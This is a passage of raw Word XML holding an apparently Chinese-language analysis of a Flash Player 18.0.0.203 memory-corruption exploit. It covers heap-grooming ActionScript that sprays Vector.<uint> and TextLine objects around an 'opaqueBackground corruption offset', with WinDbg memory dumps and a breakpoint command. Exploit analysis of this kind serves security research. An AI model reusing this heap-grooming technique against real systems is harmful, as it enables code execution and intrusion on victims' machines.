        <w:t xml:space="preserve">  0-0</w:t>
      </w:r>
      <w:r w:rsidR="002C2E6A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="001F6342">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063750F" w:rsidRDefault="0063750F" w:rsidP="00AD1D34">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0063750F">
        <w:t xml:space="preserve">_vLen = 400/4-2; </w:t>
      </w:r>
      <w:r w:rsidRPr="0063750F">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35223" w:rsidRDefault="00F35223" w:rsidP="00AD1D34">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>// fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35223" w:rsidRPr="00D63152" w:rsidRDefault="00F35223" w:rsidP="00AD1D34">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">for(var i:int; i &lt; _arLen1; i++) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63152">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="0063750F" w:rsidRPr="00D63152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  0 </w:t>
      </w:r>
      <w:r w:rsidR="00D63152" w:rsidRPr="00D63152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;= </w:t>
      </w:r>
      <w:r w:rsidR="00D63152" w:rsidRPr="00D63152">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00D63152" w:rsidRPr="00D63152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0063750F" w:rsidRPr="00D63152">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00D63152" w:rsidRPr="00D63152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="0063750F" w:rsidRPr="00D63152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x1e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35223" w:rsidRDefault="00F35223" w:rsidP="00AD1D34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_ar[i] = new Vector.&lt;uint&gt;(_vLen);//_vLen=</w:t>
      </w:r>
      <w:r w:rsidR="005C50A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x62</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35223" w:rsidRDefault="00F35223" w:rsidP="00AD1D34">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B2107" w:rsidRDefault="001B2107" w:rsidP="001F6342">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此段代码执行后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ArrayObject-&gt;m_buffer+8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处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0x1e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>偏移填充了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vector&lt;uint&gt;(_vLen)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:r>
        <w:t>0:008&gt; dd 092ff4c0 +8</w:t>
      </w:r>
      <w:r w:rsidR="00216CB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  //</w:t>
      </w:r>
      <w:r w:rsidR="00056795">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00216CB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0-0x1e</w:t>
      </w:r>
      <w:r w:rsidR="00F3410D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB3B23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">fill </w:t>
      </w:r>
      <w:r w:rsidR="00216CB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRPr="00701CCE" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">092ff4c8  </w:t>
      </w:r>
      <w:r w:rsidRPr="00701CCE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>09327df9 09327e21 09327e49 09327e99</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRPr="00701CCE" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00701CCE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>092ff4d8  09327ec1 09327ee9 08f25039 08f25061</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRPr="00701CCE" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00701CCE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>092ff4e8  08f25089 08f250b1 08f250d9 08f25101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRPr="00701CCE" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00701CCE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>092ff4f8  08f25129 08f25151 08f25179 08f251a1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRPr="00701CCE" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00701CCE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>092ff508  08f251c9 08f251f1 08f25219 08f25241</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRPr="00701CCE" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00701CCE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>092ff518  08f25269 08f25291 08f252b9 08f252e1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRPr="00701CCE" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00701CCE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>092ff528  08f25309 08f25331 08f25359 08f25381</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:r w:rsidRPr="00701CCE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>092ff538  08f253a9 08f253d1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A74C0" w:rsidRDefault="001B4739" w:rsidP="001F6342">
      <w:r w:rsidRPr="00646973">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>//vector.&lt;uint&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(_vLen)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:r>
        <w:t xml:space="preserve">0:008&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00646973">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>dd 09327df9 -1</w:t>
      </w:r>
      <w:r w:rsidRPr="00646973">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00646973" w:rsidRPr="00646973">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00646973" w:rsidRPr="00646973">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>atom decrement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:r>
        <w:t>09327df8  08204748 00000002 0934d1f0 092bffd0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:r>
        <w:t xml:space="preserve">09327e08  09318150 00000000 </w:t>
      </w:r>
      <w:r w:rsidRPr="003844A1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">093cf1b0 </w:t>
      </w:r>
      <w:r>
        <w:t>00000000</w:t>
      </w:r>
      <w:r w:rsidR="003844A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    //m_buffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>09327e18  00000000 00000000 08204748 00000002</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:r>
        <w:t>09327e28  0934d1f0 092bffd0 09318150 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:r>
        <w:t>09327e38  093cf340 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:r>
        <w:t>09327e48  08204748 00000002 0934d1f0 092bffd0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:r>
        <w:t>09327e58  09318150 00000000 093cf4d0 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63152" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:r>
        <w:t>09327e68  00000000 00000000 081f2e90 00000004</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001955F8" w:rsidRDefault="001955F8" w:rsidP="001F6342"/>
    <w:p w:rsidR="002908DD" w:rsidRDefault="002908DD" w:rsidP="002908DD">
      <w:r>
        <w:t xml:space="preserve">0:008&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB485F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">dd 093cf1b0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB485F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> //vector buffer </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002908DD" w:rsidRDefault="002908DD" w:rsidP="002908DD">
      <w:r>
        <w:t xml:space="preserve">093cf1b0  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A2143C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">00000062 </w:t>
      </w:r>
      <w:r>
        <w:t>08d42000 00000000 00000000</w:t>
      </w:r>
      <w:r w:rsidR="00A2143C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> //length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002908DD" w:rsidRDefault="002908DD" w:rsidP="002908DD">
      <w:r>
        <w:t>093cf1c0  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002908DD" w:rsidRDefault="002908DD" w:rsidP="002908DD">
      <w:r>
        <w:t>093cf1d0  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002908DD" w:rsidRDefault="002908DD" w:rsidP="002908DD">
      <w:r>
        <w:t>093cf1e0  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002908DD" w:rsidRDefault="002908DD" w:rsidP="002908DD">
      <w:r>
        <w:t>093cf1f0  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002908DD" w:rsidRDefault="002908DD" w:rsidP="002908DD">
      <w:r>
        <w:t>093cf200  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002908DD" w:rsidRDefault="002908DD" w:rsidP="002908DD">
      <w:r>
        <w:t>093cf210  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRDefault="002908DD" w:rsidP="002908DD">
      <w:r>
        <w:t>093cf220  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6342" w:rsidRDefault="001F6342" w:rsidP="001F6342"/>
    <w:p w:rsidR="00D63152" w:rsidRDefault="001F6342" w:rsidP="001F6342">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4 Fill Array </w:t>
      </w:r>
      <w:r w:rsidR="00016053">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>memory   0</w:t>
      </w:r>
      <w:r w:rsidR="002C2E6A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2E-0</w:t>
      </w:r>
      <w:r w:rsidR="002C2E6A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35223" w:rsidRDefault="00F35223" w:rsidP="00AD1D34">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>// prepare Vector objects</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35223" w:rsidRDefault="00F35223" w:rsidP="00AD1D34">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>for(i=_arLen2; i &lt; _arLen; i++){</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63152">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00D63152" w:rsidRPr="00D63152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x2e&lt;=i&lt;</w:t>
      </w:r>
      <w:r w:rsidR="0063750F" w:rsidRPr="00D63152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x7e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35223" w:rsidRDefault="00F35223" w:rsidP="00AD1D34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_ar[i] = new Vector.&lt;uint&gt;(8);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35223" w:rsidRDefault="00F35223" w:rsidP="00AD1D34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_ar[i][0] = i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00F35223" w:rsidP="00AD1D34">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00195C71" w:rsidRDefault="00023067" w:rsidP="00F35223">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此段代码执行后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ArrayObject-&gt;m_buffer+8+0x2e*</w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处填充了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vector&lt;uint&gt;(8)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r w:rsidR="00271BFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，见蓝色字体部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373354" w:rsidRDefault="00373354" w:rsidP="00373354">
      <w:r>
        <w:t>0:008&gt; dd 08d560b0 +8 l0x7e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373354" w:rsidRDefault="00373354" w:rsidP="00373354">
      <w:r>
        <w:t>08d560b8  09327df9 09327e21 09327e49 09327e99</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373354" w:rsidRDefault="00373354" w:rsidP="00373354">
      <w:r>
        <w:t>08d560c8  09327ec1 09327ee9 08f25039 08f25061</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373354" w:rsidRDefault="00373354" w:rsidP="00373354">
      <w:r>
        <w:t>08d560d8  08f25089 08f250b1 08f250d9 08f25101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373354" w:rsidRDefault="00373354" w:rsidP="00373354">
      <w:r>
        <w:t>08d560e8  08f25129 08f25151 08f25179 08f251a1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373354" w:rsidRDefault="00373354" w:rsidP="00373354">
      <w:r>
        <w:t>08d560f8  08f251c9 08f251f1 08f25219 08f25241</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373354" w:rsidRDefault="00373354" w:rsidP="00373354">
      <w:r>
        <w:t>08d56108  08f25269 08f25291 08f252b9 08f252e1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373354" w:rsidRDefault="00373354" w:rsidP="00373354">
      <w:r>
        <w:t>08d56118  08f25309 08f25331 08f25359 08f25381</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373354" w:rsidRDefault="00373354" w:rsidP="00373354">
      <w:r>
        <w:t>08d56128  08f253a9 08f253d1 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373354" w:rsidRDefault="00373354" w:rsidP="00373354">
      <w:r>
        <w:t>08d56138  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373354" w:rsidRDefault="00373354" w:rsidP="00373354">
      <w:r>
        <w:t>08d56148  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373354" w:rsidRDefault="00373354" w:rsidP="00373354">
      <w:r>
        <w:t>08d56158  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373354" w:rsidRPr="0061732C" w:rsidRDefault="00373354" w:rsidP="00373354">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">08d56168  00000000 00000000 </w:t>
      </w:r>
      <w:r w:rsidRPr="0061732C">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>08f253f9 08f2542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178  08f25449 08f25471 08f25499 08f254c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188  08f254e9 08f25511 08f25539 08f2556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198  08f25589 08f255b1 08f255d9 08f2560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lastRenderedPageBreak/>
        <w:t>08d561a8  08f25629 08f25651 08f25679 08f256a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1b8  08f256c9 08f256f1 08f25719 08f2574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1c8  08f25769 08f25791 08f257b9 08f257e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1d8  08f25809 08f25831 08f25859 08f2588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1e8  08f258a9 08f258d1 08f258f9 08f2592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1f8  08f25949 08f25971 08f25999 08f259c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08  08f259e9 08f25a11 08f25a39 08f25a6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18  08f25a89 08f25ab1 08f25ad9 08f25b0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28  08f25b29 08f25b51 08f25b79 08f25ba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38  08f25bc9 08f25bf1 08f25c19 08f25c4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48  08f25c69 08f25c91 08f25cb9 08f25ce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58  08f25d09 08f25d31 08f25d59 08f25d8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68  08f25da9 08f25dd1 08f25df9 08f25e2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78  08f25e49 08f25e71 08f25e99 08f25ec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88  08f25ee9 08f25f11 08f25f39 08f25f61</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373354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98  08f25f89 08f25fb1 08f25fd9 09956039</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00195C71" w:rsidRPr="0061732C" w:rsidRDefault="00373354" w:rsidP="00373354">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0061732C">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>08d562a8  09956061 09956089</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373354" w:rsidRDefault="00373354" w:rsidP="00373354"/>
    <w:p w:rsidR="0063750F" w:rsidRPr="0063750F" w:rsidRDefault="001F6342" w:rsidP="0063750F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rStyle w:val="4Char"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00BA5AD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0063750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="0063750F">
        <w:t>repare TextLines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  0x1e-0x2e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00C77C57" w:rsidP="00C77C57"/>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00093719" w:rsidP="00C77C57">
      <w:r w:rsidRPr="00093719">
        <w:t>bu Flash32_18_0_0_203!DllUnregisterServer+0xa4750 ".echo createtextline;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093719" w:rsidRDefault="00093719" w:rsidP="00C77C57"/>
    <w:p w:rsidR="00093719" w:rsidRDefault="00093719" w:rsidP="00C77C57"/>
    <w:p w:rsidR="0063750F" w:rsidRDefault="0063750F" w:rsidP="00AD1D34">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>// prepare TextLines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063750F" w:rsidRDefault="0063750F" w:rsidP="00AD1D34">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">for(i=_arLen1; i &lt; _arLen2; i++) </w:t>
      </w:r>
      <w:r w:rsidR="00D63152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r w:rsidR="00D63152" w:rsidRPr="00D63152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0x1e&lt;= i&lt; 0x2e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="0063750F" w:rsidP="00AD1D34">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>_ar[i] = _tb.createTextLine();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00CC2CC2" w:rsidP="00C77C57">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此段代码从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x1e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0x2e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TextLineObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
